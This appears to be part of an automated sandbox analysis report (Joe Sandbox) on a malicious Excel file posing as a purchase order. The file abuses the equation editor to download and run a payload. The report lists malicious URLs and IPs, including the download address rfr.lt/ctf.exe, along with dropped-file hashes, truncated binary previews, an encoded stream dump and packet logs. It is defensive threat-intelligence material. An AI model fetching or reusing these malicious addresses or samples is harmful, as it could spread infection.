                    http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.508105217.0000000004650000.00000002.00020000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.mozilla.com0explorer.exe, 00000006.00000000.490190068.00000000077B8000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://nsis.sf.net/NSIS_ErrorErrorword.exe, 00000004.00000002.460903061.0000000000409000.00000004.00020000.sdmp, word.exe, 00000004.00000000.455354030.0000000000409000.00000008.00020000.sdmp, word.exe, 00000005.00000000.457625116.0000000000409000.00000008.00020000.sdmpfalse
                      		high
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.486080664.0000000002CC7000.00000002.00020000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmpfalse
                        		high
                        http://treyresearch.netexplorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.508105217.0000000004650000.00000002.00020000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.486080664.0000000002CC7000.00000002.00020000.sdmpfalse
                          		high
                          http://java.sun.comexplorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.486080664.0000000002CC7000.00000002.00020000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.word.exe, 00000004.00000002.461790734.0000000002270000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.474381153.0000000001BE0000.00000002.00020000.sdmpfalse
                            		high
                            http://nsis.sf.net/NSIS_Errorword.exe, word.exe, 00000004.00000002.460903061.0000000000409000.00000004.00020000.sdmp, word.exe, 00000004.00000000.455354030.0000000000409000.00000008.00020000.sdmp, word.exe, 00000005.00000000.457625116.0000000000409000.00000008.00020000.sdmpfalse
                              		high
                              http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.482857709.0000000008476000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.505380794.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.469017996.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.484250072.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.472707268.0000000008476000.00000004.00000001.sdmpfalse
                                		high
                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleaexplorer.exe, 00000006.00000000.490387548.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472307978.0000000008374000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.piriform.com/ccleanerKexplorer.exe, 00000006.00000000.490387548.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472307978.0000000008374000.00000004.00000001.sdmpfalse
                                    		high
                                    http://investor.msn.com/explorer.exe, 00000006.00000000.466600735.0000000002AE0000.00000002.00020000.sdmpfalse
                                      		high
                                      http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.482857709.0000000008476000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.469131172.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.479966015.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.488819431.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.507699566.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.490387548.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.505380794.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.469017996.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.484250072.00000000002C7000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.472307978.0000000008374000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472707268.0000000008476000.00000004.00000001.sdmpfalse
                                        		high
                                        http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.469518073.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.508105217.0000000004650000.00000002.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        http://www.%s.comPAword.exe, 00000004.00000002.461790734.0000000002270000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.474381153.0000000001BE0000.00000002.00020000.sdmpfalse
                                        • URL Reputation: safe
                                        		low
                                        http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmpfalse
                                          		high
                                          https://support.mozilla.orgexplorer.exe, 00000006.00000000.474137031.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.484170367.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.463523222.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.505342356.0000000000255000.00000004.00000020.sdmpfalse
                                            		high
                                            http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.507160581.0000000003E50000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.673859564.0000000001CF0000.00000002.00020000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            23.227.38.74
                                            		shops.myshopify.comCanada
                                            		13335CLOUDFLARENETUStrue
                                            198.54.117.212
                                            		parkingpage.namecheap.comUnited States
                                            		22612NAMECHEAP-NETUSfalse
                                            91.203.68.162
                                            		rfr.ltLatvia
                                            		43513NANO-ASLVtrue

                                            General Information

                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                            Analysis ID:553050
                                            Start date:14.01.2022
                                            Start time:08:03:53
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 9m 55s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:HME AG PO 2091.xlsx
                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                            Number of analysed new started processes analysed:12
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.expl.evad.winXLSX@9/9@3/3
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HDC Information:
                                            • Successful, ratio: 46.5% (good quality ratio 41.4%)
                                            • Quality average: 70.9%
                                            • Quality standard deviation: 33.4%
                                            HCA Information:
                                            • Successful, ratio: 87%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .xlsx
                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                            • Attach to Office via COM
                                            • Active ActiveX Object
                                            • Scroll down
                                            • Close Viewer
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                            • TCP Packets have been reduced to 100
                                            • Not all processes where analyzed, report is missing behavior information

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            08:05:40API Interceptor60x Sleep call for process: EQNEDT32.EXE modified
                                            08:05:45API Interceptor85x Sleep call for process: word.exe modified
                                            08:06:12API Interceptor229x Sleep call for process: cscript.exe modified
                                            08:07:04API Interceptor1x Sleep call for process: explorer.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            No context

                                            Domains

                                            No context

                                            ASN

                                            No context

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ctf[1].exe
                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Category:downloaded
                                            Size (bytes):248302
                                            Entropy (8bit):7.927911380419802
                                            Encrypted:false
                                            SSDEEP:6144:owzN+wRSsYU12O6NgFRQbIuoKFFmhmvk8nw:fN+w8KCWRbRKF7vkR
                                            MD5:8EDDCC35719034649F6947B2B08BCDF3
                                            SHA1:5506B69B4584F43232F45299192A540EC0197998
                                            SHA-256:0D072A60B433F330D2BA97D75EAE7AF07E9D75BC6ED5B1065287661D05E82AB6
                                            SHA-512:C7716DAAFFFD44DFF6143D7FE0FB686EB5FC08DA918AAB204AE6D7C8687DC914D9310D488A2FFC4767E5FD643E8AEE6D88FADF28D156C6BE731C29BCC3943681
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 42%
                                            Reputation:low
                                            IE Cache URL:http://rfr.lt/ctf.exe
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.......p....@..........................................................................s.......................................................................................p...............................text...vY.......Z.................. ..`.rdata.......p.......^..............@..@.data................p..............@....ndata.......@...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Temp\5C24.tmp
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):1536
                                            Entropy (8bit):1.1464700112623651
                                            Encrypted:false
                                            SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                            MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                            SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                            SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                            SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Temp\nskF75B.tmp
                                            Process:C:\Users\user\AppData\Roaming\word.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):252172
                                            Entropy (8bit):7.750682379260983
                                            Encrypted:false
                                            SSDEEP:6144:118MKS5foIrwbBl2/IO4cwyjICBga9xtqS+W:0MKS5pwdQIC99xtqA
                                            MD5:8644B9AA55DCA97B4841D7C3878444C7
                                            SHA1:1B7CD31D5C9509868830982D39D9A3F75B7E3AD4
                                            SHA-256:C41772CB8BD860959A61F832E221F9DC634BEBD8FE4CD141E45321E348EB4181
                                            SHA-512:2DEE50DCEDF000EC57222C3D12B30F7905B18977C929C14517A0DC2937DA7B6CFF0D7FBB093059AE5607AB3C3341C856FEACD4CFAC23C89F20EBBFD50B174513
                                            Malicious:false
                                            Reputation:low
                                            Preview: .X......,.......................,C.......X.......X..........................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Temp\nskF75C.tmp\mtmmtvzho.dll
                                            Process:C:\Users\user\AppData\Roaming\word.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):4608
                                            Entropy (8bit):3.8072208508576035
                                            Encrypted:false
                                            SSDEEP:24:e31GSNNCc0teIAUdax/+TCA5dieD4ueeDFE8hueeYoNXs+f3SlLRQ0K7ABPnRuVL:CnC/I9GTxieBJInFbfGFN1RuqS
                                            MD5:D62257B9F46BB3ECC454D94B80E839E8
                                            SHA1:A33070571B7909CEB589F9CCEB8591EE2DAE5C9F
                                            SHA-256:9679F0E8F63974D80F953B8212B2668C27EC9762CDCF6ACBFD4FDF4B6D189F23
                                            SHA-512:065531AFC2DA7DD6CECC893C13E41A1F15E0FC670E0DDC006E6F87CF5CB7A9B94D36275D2050953A11350590AC4D1B1B5FB89ACAA3C6B1F3F6C466D5E155F907
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 33%
                                            Reputation:low
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z-...C]..C]..C]Z.M]..C].}B\..C]..B]..C].nG\..C].nC\..C].n.]..C].nA\..C]Rich..C]........................PE..L......a...........!......................... ...............................P............@.......................... ..H.... .......0.......................@..<.................................................... ...............................text...Q........................... ..`.rdata....... ......................@..@.rsrc........0......................@..@.reloc..<....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Temp\pawgjsvu
                                            Process:C:\Users\user\AppData\Roaming\word.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):4769
                                            Entropy (8bit):6.209190395428905
                                            Encrypted:false
                                            SSDEEP:96:/s3+C1lu78g/85QphY5tVXUcbaLrVJ83Z/Lj+HNdC+cR3Sc3owy8WwXfUE/gmc01:i+CW8Q85ghY5tVkcbkU3hFdowyPwPUEX
                                            MD5:2CF23E8F99E539C2CFA7DF0709FFE950
                                            SHA1:B0DEF49E4CA1DE39D60696FFEC5EC6ECB9399D3C
                                            SHA-256:C71C94E4AA37C19EE3E62E4F20D03CE4950D9B7BCA8755B3729CBDB7897B6FDE
                                            SHA-512:0A028931CFE2F89C9324BA125DDFE576051CE68AFE556700D89EB74F0EC19DDBE1AB2C2E7AE96523CE231B47A18E5DB4935EF22E68F8708BC7663060F888D11E
                                            Malicious:false
                                            Preview: ..aa\2...!zOV.,.a.V....L..V....L..,.a.LUiaaa.,.a^<.^<.4L.q.daaa(L.(\u^<.^<.4L.q..aaa(L.(\.^<.^<.4L.q..aaa(L.(\.^<.^<.4L.q..aaa(L.(\...]/+[.YR.jjL..(L.(\}2L..]..(L.(t.2L.2tU4]...[....2L.j\U4].(LUVO(,..}.[..aaaa.]=..,U^<..^<..^<. Y^<. .^<..^<....M.&I2..&I(e.A..`<.^<. .2L...(L.j,U.aaaa..=]Jaaa.]=..2,...2L....2...a\2.pp.V....L.2L.2a"L.ZA2L.2a2t.2..(\.2..](LU2L.2a!2t.(`2L.2\U2...a).k..9.aa.G.aa.a).^~...aa...aa.a)....m.aa.{.aa.a\2...i.V....L..L..aaa4L.(LU..aM.2LU.aa2LU!(LU2L.I(L..}...aa..M?2L..[..R.a(...(m.u4L..[....a(...(m.u[.[.YR.a4...q).^~..`aaq..d^^(L..4L.q^<..{^^^(L....aM..,.a..L.`aaa2L.2...]a\2...!.V....L..L.iaaa4L.(LU..aM.2LU.aa2LU!(LU2L.I(L..}..]aa....;aaa2L..[..R.a(...(m..2L..[....a(...(m..2L..[....(...(m..2L...[..R.j(...(e..4L..[.....(...(m..[.[.YR.a4...q).k...aaaq..U^^(L...aM.2L.2t.(`.^<.^<.^<.^<.^<..vW^^(L....aM..,.a..L.`aaa2L.2...a\2...5.L..aaa4L}(LU..aM.2LU.aa2LU!(LU2L.I(L..}.[jaa..M?2L..[..R.a(..}(m..2L..[....a(..}(m..[.[.YR.a4..}q)....faaaq.=U^^(L..^<
                                            C:\Users\user\AppData\Local\Temp\zn2eyxxq9ww5zrdhr
                                            Process:C:\Users\user\AppData\Roaming\word.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):220020
                                            Entropy (8bit):7.992864927984938
                                            Encrypted:true
                                            SSDEEP:6144:7MKS5foIrwbBl2/IO4cwyjICBga9xtqS+Wx:7MKS5pwdQIC99xtqAx
                                            MD5:A75D055E6FABC0D24984208FC2BD8877
                                            SHA1:F4071D8B3141A30FC0D70787D174B8E31C6131FC
                                            SHA-256:6497E85685A07951F80AE543BB730D7714717596140569E4D5C9388F2E6CBE59
                                            SHA-512:3A09EEF95C13AF84D71512DBFCDB2C6D87412844443411E2235E47797E9582A12FEA44848E1037B7C56C60E233CC2EA962E59BEE917F13C60103B2B196A51F4E
                                            Malicious:false
                                            Preview: .....r_..oJ...Pae...w.;.z..o../"j...p.$(<h...g....=.}4..y_e..+;...y...r......Q.._..p5$...q.......D..@....1...>G.`.OY...2.t=.)....o.....[P.u.>q.?O..........h..q......0.).Jn..%..r.M......U..,4.T.!/......N^........d....Kqt1G..G...;...k)`=@.Ow.>I.........vf.eF....:S...-"../"c...p.$(.h...g.,..=.}4..y_;!..;...`..Hc..e.|c.8...0..O|..D.h.Q.....^*"...i3....`.`.OY..F......k8.V...D..4..ML$.....bQ...m{.....uw.;^...0.).|.].E..r.H..G...A,.T.!/........V.h......d..H.Kq[1G.........k)`D@.Qw.>I..r......v..eFR...:S.+..o../"j...p.$(<h...g....=.}4..y_;!..;...`..Hc..e.|c.8...0..O|..D.h.Q.....^*"...i3....`.`.OY..F......k8.V...D..4..ML$.....bQ...m{.....uw.;^...0.).Jn..%..r,...G..m.A,4.T.!/.......NV........d..H.Kq[1G.........k)`D@.Qw.>I..r......v..eFR...:S.+..o../"j...p.$(<h...g....=.}4..y_;!..;...`..Hc..e.|c.8...0..O|..D.h.Q.....^*"...i3....`.`.OY..F......k8.V...D..4..ML$.....bQ...m{.....uw.;^...0.).Jn..%..r,...G..m.A,4.T.!/.......NV........d.
                                            C:\Users\user\AppData\Local\Temp\~DFAA19AC2D561A69CF.TMP
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1990656
                                            Entropy (8bit):7.565866635417304
                                            Encrypted:false
                                            SSDEEP:24576:YUyu6LATngkM1BqE6ENZWqlwRNXbQygHHDryOuXrl1VWgVf+Yw4y0rX+6auOUfC/:M8nMv6UZPwjeHHDrWF/i
                                            MD5:C60F89896570C0CB452EBE99B7C9971D
                                            SHA1:3853521B72EA0DAA20E7A08501E0F4BFA662E3A6
                                            SHA-256:4CEE33390C4B63D48FCEA2C1E6B876C7321F37260E2A8D411F82C31D2B525184
                                            SHA-512:06DF0523E5F1DCA5BBC5B1E23DA559283E4586FBD928451C2048095519EE77853D1BC3EB8B563834F52991CECC0D758DDFB68E2B0BB1FBDABFBDF32DFE30E086
                                            Malicious:false
                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Roaming\word.exe
                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                            Category:dropped
                                            Size (bytes):248302
                                            Entropy (8bit):7.927911380419802
                                            Encrypted:false
                                            SSDEEP:6144:owzN+wRSsYU12O6NgFRQbIuoKFFmhmvk8nw:fN+w8KCWRbRKF7vkR
                                            MD5:8EDDCC35719034649F6947B2B08BCDF3
                                            SHA1:5506B69B4584F43232F45299192A540EC0197998
                                            SHA-256:0D072A60B433F330D2BA97D75EAE7AF07E9D75BC6ED5B1065287661D05E82AB6
                                            SHA-512:C7716DAAFFFD44DFF6143D7FE0FB686EB5FC08DA918AAB204AE6D7C8687DC914D9310D488A2FFC4767E5FD643E8AEE6D88FADF28D156C6BE731C29BCC3943681
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 42%
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.......p....@..........................................................................s.......................................................................................p...............................text...vY.......Z.................. ..`.rdata.......p.......^..............@..@.data................p..............@....ndata.......@...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\Desktop\~$HME AG PO 2091.xlsx
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):165
                                            Entropy (8bit):1.4377382811115937
                                            Encrypted:false
                                            SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                            MD5:797869BB881CFBCDAC2064F92B26E46F
                                            SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                            SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                            SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                            Malicious:true
                                            Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                            Static File Info

                                            General

                                            File type:Microsoft Excel 2007+
                                            Entropy (8bit):7.998345830581208
                                            TrID:
                                            • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                            • ZIP compressed archive (8000/1) 16.67%
                                            File name:HME AG PO 2091.xlsx
                                            File size:1703303
                                            MD5:29ee298412e6d2cb968a883563837cbe
                                            SHA1:7ed1c5713ba7ff23e36fecdedb0f0c012f6c647b
                                            SHA256:22355ce0bfc092836a0d62f6cbb54d03aa6fb26091ecd1907922fb9f6e0d0880
                                            SHA512:fd26d093d6d2fd9885b1133033642e1a4c740c0070e8ba4d35b15ed0d95b22b92cd20db4b24e95fb9efccc125ff6a8a384efde15cdb39fbaec6e1a3ac3989627
                                            SSDEEP:24576:VWyA6LUTngoM3BYC6uNjO6tqRjtLQegHH/vyG+XNphn9dMpVlRkiSVcOy12HaLMp:PQhMD6ejFqToHH/vchn9dKjSVcdHLMp
                                            File Content Preview:PK........|G-Tq.|(....g.......[Content_Types].xmlUT......a...a...a.UKK.1.....%W...("...z.TP...d...&!....... t.....K.=..<z.ee.9...-X'o...tJ.q..^.[W,.(...Y(.."..OOz.+.1#.... .k...@%b.<X.)]...o.s/.T..w..K..E.......'2....Y.|......Hl..vr.c......&.7Z.$.|n....+K

                                            File Icon

                                            Icon Hash:e4e2aa8aa4b4bcb4

                                            Static OLE Info

                                            General

                                            Document Type:OpenXML
                                            Number of OLE Files:1

                                            OLE File "/opt/package/joesandbox/database/analysis/553050/sample/HME AG PO 2091.xlsx"

                                            Indicators

                                            Has Summary Info:False
                                            Application Name:unknown
                                            Encrypted Document:False
                                            Contains Word Document Stream:
                                            Contains Workbook/Book Stream:
                                            Contains PowerPoint Document Stream:
                                            Contains Visio Document Stream:
                                            Contains ObjectPool Stream:
                                            Flash Objects Count:
                                            Contains VBA Macros:False

                                            Summary

                                            Author:HP
                                            Last Saved By:HP
                                            Create Time:2021-09-22T12:07:42Z
                                            Last Saved Time:2021-09-22T12:08:47Z
                                            Creating Application:Microsoft Excel
                                            Security:0

                                            Document Summary

                                            Thumbnail Scaling Desired:false
                                            Contains Dirty Links:false
                                            Shared Document:false
                                            Changed Hyperlinks:false
                                            Application Version:12.0000

                                            Streams

                                            Stream Path: Equation Native, File Type: data, Stream Size: 1973002
                                            General
                                            Stream Path:Equation Native
                                            File Type:data
                                            Stream Size:1973002
                                            Entropy:7.56041819835
                                            Base64 Encoded:True
                                            Data ASCII:. . . . . . ! K . . . . . @ . K v . Q ] . . . . . . . . . . . . . . . . . . . . . W . . . Z . M " . E . . ( . . . t . . . , . . j . . U . . . S < u . - . . e . . . ` . B . h . . 0 . < $ . . K K q 9 . . . . . e . . t : > . . . G . . | . M t U D 5 T . D o . . . . . K . i . . . . f u . = e . . | . y I [ a . . j . e I . . . . q . } . . K . E ] . 3 . b . o . . } h 5 . C . , . . . [ e . . . z 5 . . & H a . . k ` 3 9 V . 6 . . . . . . . . . . . d q . . . . . + . H . v t . G . Y . . 2 . . . . . . @ j . o . . .
                                            Data Raw:1c 00 f8 06 00 00 21 4b ee 1a 1e 00 83 40 ee 4b 76 ac 51 5d e0 09 f0 12 fc e1 1f 18 03 13 01 0f cf 0a 01 08 92 7f bd cf bd 57 d1 81 e5 5a fd 4d 22 8b 45 f2 8b 28 b9 84 86 74 95 81 c1 2c e1 d1 6a 8b 11 55 ff d2 05 53 3c 75 a6 2d e6 08 65 a6 ff e0 60 dc 42 00 68 18 06 30 0b 3c 24 c8 06 4b 4b 71 39 8e 20 e3 81 f2 bc 65 d8 d6 74 3a 3e ee c9 16 47 1b a6 7c 8a 4d 74 55 44 35 54 87 44 6f
                                            Stream Path: K8TC1, File Type: empty, Stream Size: 0
                                            General
                                            Stream Path:K8TC1
                                            File Type:empty
                                            Stream Size:0
                                            Entropy:0.0
                                            Base64 Encoded:False
                                            Data ASCII:
                                            Data Raw:

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            01/14/22-08:06:29.588785TCP1201ATTACK-RESPONSES 403 Forbidden804916623.227.38.74192.168.2.22

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 14, 2022 08:05:05.696058035 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.748666048 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.748758078 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.749198914 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.800890923 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.809087038 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.809113026 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.809134960 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.809160948 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.809176922 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.809207916 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.809223890 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.809248924 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.809278965 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.809286118 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.809305906 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.809333086 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.809340954 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.809365988 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.809389114 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.809402943 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.809429884 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.820516109 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.861282110 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.861330986 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.861365080 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.861387968 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.861432076 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.861479044 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.861498117 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.861536026 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.861572027 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.861625910 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.861638069 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.861677885 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.861710072 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.861754894 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.861776114 CET4916580192.168.2.2291.203.68.162
